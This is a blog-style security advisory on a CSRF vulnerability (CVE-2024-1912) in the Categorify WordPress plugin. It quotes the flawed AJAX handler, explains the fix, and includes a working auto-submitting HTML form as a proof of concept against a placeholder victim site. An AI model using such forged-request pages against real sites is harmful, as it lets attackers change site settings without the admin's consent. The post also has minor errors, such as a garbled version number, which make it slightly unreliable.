If you’re using the Categorify plugin on your WordPress website, there’s an urgent security issue you need to know about: CVE-2024-1912. This critical bug means attackers could change the order of your categories—or worse—from afar, without even logging in. In this post, I’ll break down what’s wrong, how it works, show real code, and explain how to protect your site.
What Is CVE-2024-1912?
CVE-2024-1912 is a Cross-Site Request Forgery (CSRF) vulnerability affecting all versions up to and including Categorify 1..7.4. In simple terms, a CSRF flaw lets hackers trick *logged-in* site admins into making unwanted changes by simply clicking a bad link or visiting a malicious website. Here’s exactly what causes the problem:
Root Cause
The plugin’s AJAX handler, categorifyAjaxUpdateFolderPosition, does not correctly check nonces (WordPress’s way of verifying requests are deliberate and secure). Without nonce verification, any attacker can forge a web request as if it came from a real admin.
A successful exploit allows an attacker to
- Change the position/folder of categories
Technical Details and Exploit
Let’s look at the vulnerable code directly and see how a bad actor could take advantage.
Vulnerable Code (from Categorify)
add_action('wp_ajax_categorifyUpdateFolderPosition', 'categorifyAjaxUpdateFolderPosition');
function categorifyAjaxUpdateFolderPosition() {
// ...snip...
$folder_id = $_POST['folder_id'];
$position = $_POST['position'];
// Missing: check_admin_referer or any nonce validation
update_option('categorify_folder_' . $folder_id, $position);
// ...snip...
}
Notice what’s not there: there’s no check_ajax_referer() or any nonce validation happening.
An attacker builds a web page like this
<form action="https://victim-wordpress-site.com/wp-admin/admin-ajax.php"; method="POST" id="evilForm">
<input type="hidden" name="action" value="categorifyUpdateFolderPosition">
<input type="hidden" name="folder_id" value="3">
<input type="hidden" name="position" value="666">
</form>
<script>
document.getElementById('evilForm').submit();
</script>
They trick an admin into visiting this web page while logged in to WordPress. The form silently sends a request to update the folder position for folder_id=3 to a new one. The server thinks it’s a legit admin update!
References and Further Reading
- Wordfence Advisory for CVE-2024-1912
- Categorify Plugin on WordPress.org
- OWASP: Cross-Site Request Forgery (CSRF)
- Plugin Directory: See if categorify update is available
What Should You Do?
- Upgrade Categorify: As of this writing, the fix may still be pending. Check the official plugin page for updates.
Log Out When Done: Don’t stay logged into your site in background browser tabs.
- Consider Additional Security Plugins: Some security plugins like Wordfence or Sucuri can block unauthorized admin-ajax.php requests.
- Short Term Fix: You can manually disable the plugin until an update is released, or add additional firewall rules to block public access to admin-ajax.php endpoints for logged out users.
How to Fix as a Developer
If you can’t wait for an official update, you can patch your version. Add a nonce check like this inside categorifyAjaxUpdateFolderPosition():
function categorifyAjaxUpdateFolderPosition() {
check_ajax_referer('categorify_nonce_action', 'security');
// old code below...
}
And enqueue a nonce field with your AJAX scripts. See the WordPress codex on AJAX security.
Final Thoughts
CSRF issues like CVE-2024-1912 are a common but serious threat on WordPress sites. Always keep plugins updated and never ignore security advisories. If you’re a Categorify user, act now—either update or disable until a fixed version is out.
Stay secure!
*Did this post help you? Share it with other WordPress site owners and admins to keep the community safe.*
*This report is based on exclusive synthesis and references to trusted security bulletins. For breaking updates, bookmark Wordfence Threat Intelligence.*
Timeline
Published on: 02/27/2024 11:15:09 UTC
Last modified on: 02/27/2024 14:19:41 UTC